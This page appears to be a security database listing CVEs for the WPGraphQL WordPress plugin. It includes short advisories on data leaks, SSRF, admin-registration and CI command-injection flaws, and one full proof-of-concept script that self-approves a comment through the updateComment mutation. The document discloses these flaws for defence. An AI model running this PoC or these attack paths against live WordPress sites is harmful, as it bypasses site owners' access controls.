cleantalk
Vulnerabilities and Security Research

Vulnerabilities and security research for wp-graphql/wp-graphql

Jun 06, 2024

WPGraphQL # CVE-2019-9880

CVE, Research URL: CVE-2019-9880
Application: WPGraphQL
Date: Jun 10, 2019
Research Description: An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible for an unauthenticated attacker to retrieve all WordPress users' details, such as email address, role, and username.
Affected versions: max 0.3.0.
Status: vulnerable

WPGraphQL # CVE-2023-23684

CVE, Research URL: CVE-2023-23684
Application: WPGraphQL
Date: Nov 13, 2023
Research Description: Server-Side Request Forgery (SSRF) vulnerability in WPGraphQL. This issue affects WPGraphQL: from n/a through 1.14.5.
Affected versions: max 1.14.6.
Status: vulnerable

WPGraphQL # CVE-2019-9881

CVE, Research URL: CVE-2019-9881
Application: WPGraphQL
Date: Jun 10, 2019
Research Description: The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Affected versions: max 0.3.0.
Status: vulnerable

WPGraphQL # CVE-2019-25060

CVE, Research URL: CVE-2019-25060
Application: WPGraphQL
Date: May 09, 2022
Research Description: The WPGraphQL WordPress plugin before 0.3.5 doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.
Affected versions: max 0.3.0.
Status: vulnerable

WPGraphQL # CVE-2019-9879

CVE, Research URL: CVE-2019-9879
Application: WPGraphQL
Date: Jun 10, 2019
Research Description: The WPGraphQL 0.2.3 plugin for WordPress allows remote attackers to register a new user with admin privileges, whenever new user registrations are allowed. This is related to the registerUser mutation.
Affected versions: max 0.3.0.
Status: vulnerable
Jun 10, 2024

WPGraphQL # CVE-2021-31157

CVE, Research URL: CVE-2021-31157
Application: WPGraphQL
Date: -
Research Description: The WPGraphQL plugin for WordPress is vulnerable to Denial of Service via field duplication in versions up to, and including, 1.3.5. This makes it possible for unauthenticated attackers to rapidly duplicate fields and queries, resulting in OOM and MySQL connection errors.
Affected versions: max 1.3.5.
Status: vulnerable
Apr 18, 2026

WPGraphQL # CVE-2026-27938

CVE, Research URL: CVE-2026-27938
Application: WPGraphQL
Date: Feb 26, 2026
Research Description: WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.9.1, the `wp-graphql/wp-graphql` repository contains a GitHub Actions workflow (`release.yml`) vulnerable to OS command injection through direct use of `${{ github.event.pull_request.body }}` inside a `run:` shell block. When a pull request from `develop` to `master` is merged, the PR body is injected verbatim into a shell command, allowing arbitrary command execution on the Actions runner. Version 2.9.1 contains a fix for the vulnerability.
Affected versions: max 2.9.1.
Status: vulnerable

WPGraphQL # CVE-2026-33290

CVE, Research URL: CVE-2026-33290
Application: WPGraphQL
Date: Mar 24, 2026
Research Description: WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change the moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.

### Details

In WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:

- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.
- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99 also allows the comment owner, even if they lack moderation capability.
- plugins/wp-graphql/src/Data/CommentMutation.php:94 maps the GraphQL input status directly to WordPress comment_approved.
- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120 persists that value via wp_update_comment.
- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).

This means a non-moderator owner can submit status during update and transition the moderation state.

### PoC

Tested in local wp-env (Docker) with WPGraphQL 2.9.1.

1. Start environment:

```
npm install
npm run wp-env start
```

2. Run this PoC:

```
npm run wp-env run cli -- wp eval '
add_role("no_caps","No Caps",[]);
$user_id = username_exists("poc_nocaps");
if ( ! $user_id ) {
  $user_id = wp_create_user("poc_nocaps","Passw0rd!","poc_nocaps@example.com");
}
$user = get_user_by("id",$user_id);
$user->set_role("no_caps");
$post_id = wp_insert_post([
  "post_title" => "PoC post",
  "post_status" => "publish",
  "post_type" => "post",
  "comment_status" => "open",
]);
$comment_id = wp_insert_comment([
  "comment_post_ID" => $post_id,
  "comment_content" => "pending comment",
  "user_id" => $user_id,
  "comment_author" => $user->display_name,
  "comment_author_email" => $user->user_email,
  "comment_approved" => "0",
]);
wp_set_current_user($user_id);
$result = graphql([
  "query" => "mutation U(\$id:ID!){ updateComment(input:{id:\$id,status:APPROVE}){ success comment{ databaseId status } } }",
  "variables" => [ "id" => (string)$comment_id ],
]);
echo wp_json_encode([
  "role_caps" => array_keys(array_filter((array)$user->allcaps)),
  "status" => $result["data"]["updateComment"]["comment"]["status"] ?? null,
  "db_comment_approved" => get_comment($comment_id)->comment_approved ?? null,
  "comment_id" => $comment_id
]);
'
```

3. Observe result:

- role_caps is empty (or has no moderate_comments)
- mutation returns status: APPROVE
- DB value becomes comment_approved = 1

### Impact

This is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content.
Affected versions: max 2.10.0.
Status: vulnerable